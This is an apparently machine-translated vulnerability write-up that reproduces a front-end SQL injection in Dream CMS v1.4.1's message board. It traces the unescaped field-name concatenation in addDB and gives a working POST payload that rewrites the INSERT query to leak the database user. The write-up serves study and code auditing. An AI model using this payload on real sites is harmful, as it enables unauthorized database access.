Dream CMS The front desk SQL Inject

• Dream CMS The front desk SQL Inject

  • Vulnerability requirements
  • Vulnerability analysis
  • Vulnerability testing
  • Summary
  • Related links

v1.4.1 The source code of version is placed in the current directory , To prevent the following vulnerabilities, the source code cannot be found

Vulnerability requirements

• edition ：v1.4.1

Vulnerability analysis

This article is based on https://xz.aliyun.com/t/11224 The loopholes in this master's article are reproduced , So look directly at the loopholes , This Receptionist SQL The injection point is quite interesting , After learning SQl After injection , You can learn well through this loophole .

The flaw is in the message board on the front desk , See this place , It may be easier to think of those who have just learned loopholes xss, But here is a SQL Inject Know the request when saving the message according to the packet capture url yes /index.php?m=Book&a=setBook, The code file corresponding to this request is c/index/BookAction.class.php The following parts of ：

public function index(){
      if(isset($_POST['setbook'])){// Submit message 
          $data = $this->checkData();
          if($this->bookModel->add($data)){
              $this->setBookTime(); // Store submission time 
              rewrite::succ($this->l['book_ok']);
          }else{
              rewrite::error($this->l['book_error']);
          }
      }
      // Judge whether to call message data 
      if($GLOBALS['public']['isbookdata']){
              // Judge whether to call approval only 
              $where = '';
              if($GLOBALS['public']['bookDisplay']) $where = 'ischeck=1';
              $count = $this->bookModel->count($where);
              $page = new page($count,$GLOBALS['public']['booknum']);
              $data = $this->bookModel->getData($page->returnLimit(),$where);
              $this->smarty->assign('list',$data);
              $this->smarty->assign('num',$count);
              $this->smarty->assign('page',$page->html());
      }
      $this->smarty->display('book/index.html');
  }

In the code $data = $this->checkData(); call checkData() Check and process the requested data , Filter xss,sql Inject , And limit the submission interval , Then there's the call $this->bookModel->add($data) Storage and warehousing of data .

Continue to see the code call to m/BookModel.class.php The following code ：

// Add a message at the front desk 
public function add($data){
    $data['time'] = time();
    return parent::addModel($data);
}

And code files class/Model.class.php The following code of ：

// Add data and return id
protected function addModel($data){
    return parent::addDB($this->tab[0],$data);
}

Finally, it is called to the code file class/db.class.php The following parts of ：

// increase 
protected function addDB($tab,$data){
    foreach($data as $key=>$v){
        $field[]=$key;
        $value[]="'$v'";
    }
    $field = implode(',',$field);
    $value = implode(",",$value);
    $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)";
    $this->query($sql);
    return mysql_insert_id();
}

And the problem of loopholes is also in the last addDB On the way , there SQL Splicing is the incoming array data loop , All database fields are appended to $field Array , be-all The inserted value is appended to $value Array , Both through implode Method to convert the array Comma separated strings , And finally spliced to $sql variable . $field[]=$key; about The splicing of field names does not do any processing , So we can inject in this place .

Vulnerability testing

We are in the saved browse request data , Change the data content as follows ： name=%E5%95%8A%E5%95%8A%E5%95%8A&mail=aa%40qq.com&tel=121111&content=2323&setbook=%E6%8F%90%E4%BA%A4&time,ischeck)VALUES(user(),1,1,1,1,1,1);#=1

In fact, it is to add &time,ischeck)VALUES(user(),1,1,1,1,1,1);#=1 The content splices the original to the back SQL Commented out , We debug printing $sql="INSERT INTO ".DB_PRE."$tab($field) VALUES($value)"; You can see the following ：

INSERT INTO lmx_book(name,content,mail,tel,ip,time,ischeck)VALUES(user(),1,1,1,1,1,1);#,time) VALUES(' Ah ah ','2323','[email protected]','121111','192.168.80.1','1','1657690699')

Look at your message on the message board, that is, you can see the database user name from the user name

Summary

This code acts as SQL Injection learning and getting started with code auditing are good little exercises .

Related links

• https://xz.aliyun.com/t/11224
• http://www.lmxcms.com/down/xitong/20210530/14.html